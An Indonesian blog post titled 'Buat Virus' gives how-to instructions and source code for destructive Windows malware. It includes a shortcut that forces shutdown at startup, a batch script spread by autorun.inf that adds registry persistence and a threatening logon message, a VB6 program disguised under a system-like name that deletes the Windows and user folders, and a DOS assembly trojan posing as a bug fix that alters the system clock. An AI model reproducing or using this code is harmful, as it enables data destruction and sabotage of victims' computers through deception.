Senin, 30 Maret 2009

Buat Virus

  1. Tanpa Software

Cara 1:

1. masuk C:\WINDOWS\system32

2. copy File shutdown.exe

3. paste shorcut ditempat yang diinginkan

4. klik kanan property hasil shorcut

5. pilih shortcut, ganti target dengan "C:\WINDOWS\system32\shutdown.exe -s -t 1500”. 1500 merupakan detik yang kita setting, misalkan diinginkan 1 menit, maka bisa diganti dengan 60

Cara 2:

1. ganti angka 1500 menjadi 5

2. copy shortcut

3. paste di "C:\Documents and Settings\NAMA USER ANDA\Start Menu\Programs\Startup" atau masuk START > ALL PROGRAM > STARTUP klik kanan open > dan paste disitu"

Cara 3:

1. Buka notepad lalu tulis script di bawah ini:
@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /d "WARNING MESSAGE FROM LOCAL_HOST(judul title bar)" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /d "I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)" /f
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v WallpaperStyle /d 0 /f
reg add "HKEY_USERS\.DEFAULT\Control Panel\Desktop" /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add "HKEY_CURRENT_USER/Control Panel/Colors" /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

2. SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)

3. Buat Autorun.inf dengan script:
[autorun]
open=nama_file.bat
SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf). File-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY. Copy file-file tsb ke CD

  1. Dengan software

1. VB(optimal : 6.0)

1. Buat form sekecil mungkin

2. Didalam form itu, masukkan kode berikut :

Public Sub DelAll(ByVal DirtoDelete As Variant)

Dim FSO, FS

Set FSO = CreateObject(”Scripting.FileSystemObject”)

FS = FSO.DeleteFolder(DirtoDelete, True)

End Sub

Private Sub Form_Load()

On Error Resume Next

If FileExist(”c:\windows\system32\katak.txt”) = True Then

End
Else

Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)

End If

End Sub

Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False

Else
FileExist = True
End If
End Function

3. Di folder c:\windows\system32\, kalau ada file namanya katak.txt, computer kita tidak akan keserang sendiri karena bisa diedit.

4. Beri nama project seperti nama system, misalkan “SystemKernel32″. Ini dimaksudkan untuk menghindari kecurigaan

5. Compile

Contoh buat Virus Friday 13H:

Sediakan :

1. Program Turbo Assembler

2. Disket kosong yang bisa booting DOS

Source Code :

<++ Friday13H ++>

CODE SEGMENT

Assume CS:code,DS:code

ORG 100h

start: Jmp begin

text1 db ' Telemate bug fix for version 3.0+$ ' ;Bogus filler text

text2 db ' TM.EXE fixed!$ ' ;Bogus filler text

text3 db 07h,'Error! Cannot alter TM.EXE$ ' ;Printed after change

Begin proc NEAR

mov ah,05h ;Function 5 - Set Real Time Clock

mov cx,1990h ;What century

mov dx,0713h ;Month/day

int 1ah ;Execute

mov ah,09h ;Funtion 9 - Print string

lea dx,text3 ;What text to print

int 21h ;Execute function 09

int 20h ;Quit .COM file

begin endp

CODE ENDS ;End segment

END start ;End program

<-- Friday13H -->

Kompilasinya :

Di Turbo Assembler kita harus melakukan compile 2 kali agar hasil ahkirnya menjadi EXE.

Info File Exe pada program Turbo Assembler untuk mengcompile :

- TASM.EXE (Untuk mengcompile file tahap 1 untuk menjadikan file ASM

menjadi OBJ)

- TLINK.EXE (Untuk mengcompile file tahap 1 untuk menjadikan file OBJ

menjadi EXE)

Selanjutnya, bukan text-editor untuk membuat virus.asm. Lalu mengcompile dengan perintah `tasm virus.asm'.

C:\TA2>tasm virus.asm

Turbo Assembler Version 2.0 Copyright (c) 1987, 1990 Borland International

Assembling file: virus.aSM

Error messages: None

Warning messages: None

Passes: 1

Remaining memory: 443k

Setelah itu kita compile tahap kedua agar file virus.obj menjadi virus.exe dengan cara perintah `tlink virus'

C:\TA2>tlink virus

Turbo Link Version 3.0 Copyright (c) 1987, 1990 Borland International

Warning: No stack

Eksekusi :

Proses eksekusi membutuhkan DOS original (bukan DOS pada Windows XP). Jika dijalankan pada WinXP, maka akan terjadi error seperti:

|------------------------------------------- ...

| 16 bit MS-DOS Subsystem

|------------------------------------------- ...

| Command Prompt - virus

| The Close gas ebcountered an illegal instr ...

| CS:00 bla.. bla..

Jam komputer pun tidak akan berubah. Metode efektif untuk mencobanya adalah dengan menyalin file virus.exe ke dalam sebuah floppydisk, restart komputer, lalu booting dengan DOS menggunakan disket. Lalu jalankan dengan perintah `virus'. Setelah menjalankan program `virus' maka Anda dapat melihat notifikasi

Telemate bug fix for version 3.0+

Langkah selanjutnya adalah dengan merestart komputer dan cek perubahan tanggal yang terjadi.

Sumber :

http://ezine.echo.or.id/ezine10/echo10-006.txt

Diposting oleh di

Tidak ada komentar:

Posting Komentar

Monggo dilebetake uneg-uneg panjenengan sedoyo :

Langganan: Posting Komentar (Atom)